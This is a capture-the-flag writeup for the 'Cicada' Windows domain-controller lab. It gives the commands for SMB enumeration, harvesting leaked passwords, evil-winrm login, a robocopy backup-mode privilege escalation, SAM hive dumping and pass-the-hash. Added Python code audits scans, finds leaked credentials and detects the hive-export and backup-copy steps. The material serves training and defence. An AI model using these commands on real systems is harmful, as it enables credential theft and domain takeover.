Dive into the depths of cybersecurity with the Cicada Capture The Flag (CTF) challenge, an easy-level test of skill designed for seasoned professionals. This intense CTF writeup guides you through advanced techniques and complex vulnerabilities, pushing your expertise to the limit.
Add Hosts

Edit the /etc/hosts file and add the following entries:

Script to add hosts automatically:

```bash
ip="10.10.11.35"
domain="cicada.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
```
Mapping

```bash
nmap -sCV cicada.htb
```

```text
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-02 22:04 CEST
Stats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.39% done; ETC: 22:05 (0:00:00 remaining)
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.051s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-03 03:04:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-03T03:05:32
|_ start_date: N/A
|_clock-skew: 7h00m00s
```
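A scan like the one above is also the starting point for a hardening review of the host. The following Python is an added example (mine, not from the writeup) that parses the port table and the host-script results and reports what a defender would act on: remote-administration ports reachable from the scanning network, cleartext LDAP, SMB signing state, and clock skew. The embedded scan text is an excerpt of the output above; the expected-port set for a plain domain controller and the remote-admin port map are my assumptions.

```python
import re

# Constructed excerpt of the nmap -sCV output shown above (the port table plus
# the host-script results), embedded so the parser runs offline.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-03 03:04:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SKEW_RE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")

# Assumption: a plain domain controller with no extra roles exposes exactly
# these ports; anything else deserves a second look.
DC_EXPECTED = {53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269}
REMOTE_ADMIN = {5985: "WinRM over HTTP", 5986: "WinRM over HTTPS", 3389: "RDP"}


def parse_ports(text):
    """Turn the PORT/STATE/SERVICE/VERSION table into a list of dicts."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports


def smb_signing_required(text):
    """True when the smb2-security-mode script reports signing as required."""
    return "Message signing enabled and required" in text


def clock_skew_seconds(text):
    """Parse nmap's clock-skew value (e.g. 7h00m00s, -1m30s) into signed seconds."""
    m = SKEW_RE.search(text)
    if not m:
        return None
    sign, h, mi, s = m.groups()
    total = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
    return -total if sign else total


def triage(text):
    """Summarise the scan from a hardening point of view."""
    open_ports = {p["port"] for p in parse_ports(text) if p["state"] == "open"}
    findings = []
    if not smb_signing_required(text):
        findings.append("SMB signing is not required: the host can be targeted by NTLM relay")
    for port in sorted(open_ports & set(REMOTE_ADMIN)):
        findings.append(f"{REMOTE_ADMIN[port]} ({port}/tcp) is reachable from the scanning network; restrict it to admin hosts")
    if 389 in open_ports:
        findings.append("Cleartext LDAP (389/tcp) is exposed; confirm LDAP signing and channel binding are enforced")
    skew = clock_skew_seconds(text)
    if skew is not None and abs(skew) > 300:
        findings.append(f"Clock differs from the scanner by {skew}s, beyond the 5-minute Kerberos tolerance; check NTP on both sides")
    unexpected = sorted(open_ports - DC_EXPECTED - set(REMOTE_ADMIN))
    if unexpected:
        findings.append(f"Ports not expected on a plain DC: {unexpected}")
    return {"open_ports": sorted(open_ports), "findings": findings}


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCAN)["findings"]:
        print("-", finding)
```

On this scan the summary raises three points (WinRM exposed, cleartext LDAP exposed, a seven-hour clock difference) and deliberately stays quiet about SMB signing, which the host already requires; that single setting is what keeps the SMB services listed above out of reach of NTLM relay.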
1. Enumerate SMB Shares Using smbclient

```bash
smbclient -L //10.10.11.35
```

- Lists available SMB shares on the target machine.
2. Access the HR Share with SMBv2

```bash
smbclient //10.10.11.35/HR -U '' -m SMB2
```

- Anonymous login to the `HR` share, forcing the SMBv2 protocol.
3. Read Notice from HR.txt for Credentials

```bash
more "Notice from HR.txt"
```

- Use `more` to read the `Notice from HR.txt` file, which contains credentials for the user `michael.wrightson`.
4. Enumerate Users via RID Bruteforce Using netexec

```bash
netexec smb --rid-brute -u guest -p '' -t 10 10.10.11.35
```

- Perform a RID brute-force against the SMB server using the `guest` account; `-t 10` raises the thread count for faster scanning.
5. Further Enumeration Using enum4linux

```bash
enum4linux-ng -u michael.wrightson -p '<password_from_notice_file>' -A 10.10.11.35 -d
```

- Run `enum4linux-ng` to gather detailed SMB information. One of the users it finds:

```yaml
'1108':
  username: david.orelious
  name: (null)
  acb: '0x00000210'
  description: Just in case I forget my password is [REDACTED]
```
6. Access DEV Share Using smbclient

```bash
smbclient -U david.orelious //10.10.11.35/DEV
```

- Navigate the `DEV` share and find `Backup_script.ps1`.
- This reveals credentials for the user `emily.oscars`.
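Steps 3, 5 and 6 all turn on the same weakness: a password written where any authenticated user can read it (a text file on an anonymous share, an account's `description` attribute, a script on a share). The Python below is an added example (mine, not from the writeup) of the audit a defender runs to find such leaks before an attacker does: one regex set applied to user records as enum4linux-ng reports them and to the contents of files pulled from shares. The user records, file bodies and passwords are constructed; the real values are redacted on this page.

```python
import re

# Constructed samples modelled on the findings in the writeup; the passwords
# and file bodies are invented, since the real ones are redacted on the page.
USERS = [
    {"rid": 1108, "username": "david.orelious",
     "description": "Just in case I forget my password is Summer2024!"},
    {"rid": 1105, "username": "michael.wrightson", "description": "Engineering"},
    {"rid": 1106, "username": "emily.oscars", "description": "Backup admin, contact IT"},
]
SHARE_FILES = {
    "HR/Notice from HR.txt": (
        "Welcome to the team!\n"
        "Your default password is: Welcome123! Please change it on first login.\n"
    ),
    "DEV/Backup_script.ps1": (
        "$password = ConvertTo-SecureString 'Str0ngPass' -AsPlainText -Force\n"
        "robocopy $source $dest /MIR\n"
    ),
    "HR/Holiday policy.txt": "Staff may carry over five days of leave.\n",
}

# Ordered from most to least specific so the first hit is the best one.
CRED_PATTERNS = [
    # PowerShell plaintext-to-SecureString conversion
    re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"]", re.I),
    # "password is X", "password: X", "pwd = X"
    re.compile(r"\bpass(?:word|wd)?\b\s*(?:is\s*[:=]?|[:=])\s*(\S+)", re.I),
    # command-line -p / --password arguments
    re.compile(r"(?:^|\s)(?:-p|--password)\s+['\"]?([^'\"\s]+)", re.I),
]


def mask(secret):
    """Keep two characters so a finding can be verified without logging the secret."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def find_credential(text):
    """Return the first credential-looking value in text, or None."""
    for pat in CRED_PATTERNS:
        m = pat.search(text)
        if m:
            return m.group(1)
    return None


def scan_descriptions(users):
    """Flag accounts whose description field leaks a password.

    The description attribute is readable by every authenticated domain user
    by default, so anything found here is exposed to the whole domain.
    """
    hits = []
    for u in users:
        secret = find_credential(u.get("description", ""))
        if secret:
            hits.append({"username": u["username"], "rid": u["rid"], "secret": mask(secret)})
    return hits


def scan_files(files):
    """Flag share files (path -> contents) that embed a password, line by line."""
    hits = []
    for path, body in files.items():
        for lineno, line in enumerate(body.splitlines(), 1):
            secret = find_credential(line)
            if secret:
                hits.append({"path": path, "line": lineno, "secret": mask(secret)})
    return hits


if __name__ == "__main__":
    for hit in scan_descriptions(USERS) + scan_files(SHARE_FILES):
        print(hit)
```

Run against the constructed data it flags `david.orelious`'s description, the HR notice and the backup script, and leaves the holiday policy alone; in a real environment the `USERS` list comes from an LDAP export of `sAMAccountName` and `description`, and `SHARE_FILES` from a crawl of the shares that `guest` or a low-privileged user can read. The fix for each hit is the same: rotate the password, remove it from the attribute or file, and move the script's credential into a secret store or a managed service account.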
7. Log in to the System Using evil-winrm

```bash
evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'
```

- Use the credentials from `Backup_script.ps1` to log in with `evil-winrm`.
8. Retrieve the user.txt Flag

```powershell
type ../Desktop/user.txt
```

- Read the `user.txt` flag on the desktop of `emily.oscars`.
9. Privilege Escalation Using robocopy

```powershell
robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B
```

- Copy `root.txt` from the Administrator's desktop to the public directory using `robocopy` with the `/B` (backup mode) flag to bypass file permissions.
10. Read the root.txt Flag

```powershell
type C:\Users\Public\root.txt
```

- Display the `root.txt` flag.
Beyond Root with NT Admin Shell

- Log Back into the System Using `evil-winrm`

```bash
evil-winrm -i 10.10.11.35 -u emily.oscars -p '<password_from_ps1>'
```

- Check Privileges in the Current Session
- Dump the SAM and SYSTEM Registry Files

```powershell
reg save hklm\sam sam
reg save hklm\system system
dir
```

- This saves the `sam` and `system` registry hives to the current directory.
- Download the SAM and SYSTEM Files

```text
download sam
download system
```

- Extract NTLM Hashes Using Impacket's `secretsdump`

```bash
impacket-secretsdump -sam sam -system system LOCAL
```

- Extract the NTLM hash:

```text
Administrator:500:aad3b43....35b51404ee:[REDACTED_HASH]:::
```

- Log in as Administrator Using the NTLM Hash

```bash
evil-winrm -u 'Administrator' -H '<Admin-Hash>' -i cicada.htb
```

- Use the Administrator NTLM hash to gain full access to the system.
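The hive export and the backup-mode copy in step 9 are the two actions a defender most wants to see in endpoint telemetry, since both are how a backup-privileged account becomes a domain administrator. The Python below is an added example (mine, not from the writeup) of two detection rules run over process-creation events: it flags `reg save` of the SAM, SYSTEM or SECURITY hive, flags `robocopy /B`, escalates the latter when the source path lies in another user's profile, and tags whether the process was spawned from a WinRM session. The events, the parent-process names and the severities are constructed assumptions modelled on the commands in this section.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal fields of a process-creation event (Sysmon ID 1 or Security 4688)."""
    ts: str
    user: str      # DOMAIN\sam-account-name
    parent: str    # parent image path
    image: str     # image path
    cmdline: str


# Constructed events modelled on the post-exploitation commands in this writeup,
# plus two benign ones to show the rules stay quiet on routine activity.
EVENTS = [
    ProcEvent("2024-10-03T03:10:01Z", r"CICADA\emily.oscars", r"C:\Windows\System32\wsmprovhost.exe",
              r"C:\Windows\System32\reg.exe", r"reg save hklm\sam sam"),
    ProcEvent("2024-10-03T03:10:03Z", r"CICADA\emily.oscars", r"C:\Windows\System32\wsmprovhost.exe",
              r"C:\Windows\System32\reg.exe", r"reg save hklm\system system"),
    ProcEvent("2024-10-03T03:12:40Z", r"CICADA\emily.oscars", r"C:\Windows\System32\wsmprovhost.exe",
              r"C:\Windows\System32\Robocopy.exe",
              r"robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B"),
    ProcEvent("2024-10-03T04:00:00Z", r"CICADA\svc_backup", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\Robocopy.exe", r"robocopy D:\Data \\backup01\nightly /B /MIR"),
    ProcEvent("2024-10-03T04:05:00Z", r"CICADA\jdoe", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\reg.exe", r"reg query hklm\software\Microsoft\Windows\CurrentVersion"),
]

HIVE_EXPORT = re.compile(r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)
BACKUP_COPY = re.compile(r"\brobocopy(?:\.exe)?\b.*\s/B(?:\s|$)", re.I)
PROFILE_DIR = re.compile(r"[A-Z]:\\Users\\([^\\\s]+)", re.I)
# wsmprovhost.exe hosts WinRM sessions, which is where an evil-winrm shell lands.
REMOTE_SHELL_PARENTS = ("wsmprovhost.exe",)


def sam_name(user):
    """Strip the DOMAIN\\ prefix and normalise case."""
    return user.split("\\")[-1].lower()


def detect(events):
    """Apply both rules to a list of ProcEvent and return the alerts in order."""
    alerts = []
    for ev in events:
        via_remote = ev.parent.lower().endswith(REMOTE_SHELL_PARENTS)
        m = HIVE_EXPORT.search(ev.cmdline)
        if m:
            alerts.append({"ts": ev.ts, "user": ev.user, "rule": "hive_export", "severity": "high",
                           "note": f"exported the {m.group(1).upper()} hive; enables offline credential extraction",
                           "via_remote_shell": via_remote})
            continue
        if BACKUP_COPY.search(ev.cmdline):
            severity = "medium"
            note = "robocopy in backup mode (/B) reads files through SeBackupPrivilege, ignoring ACLs"
            pm = PROFILE_DIR.search(ev.cmdline)
            if pm and pm.group(1).lower() not in (sam_name(ev.user), "public"):
                severity = "high"
                note = f"backup-mode copy out of another user's profile ({pm.group(1)})"
            alerts.append({"ts": ev.ts, "user": ev.user, "rule": "backup_mode_copy", "severity": severity,
                           "note": note, "via_remote_shell": via_remote})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["severity"].upper(), alert["ts"], alert["user"], alert["rule"], "-", alert["note"])
```

The scheduled backup job only reaches medium because its source is not a user profile, which is the kind of baseline you tune per environment; the three events from the WinRM session all come out high. The durable fix is on the identity side: every account that holds `SeBackupPrivilege` (members of Backup Operators, or anything granted the right through policy) can do exactly what this section does, so membership of that group on a domain controller should be reviewed as carefully as Domain Admins, and interactive or WinRM logon for backup accounts should be denied.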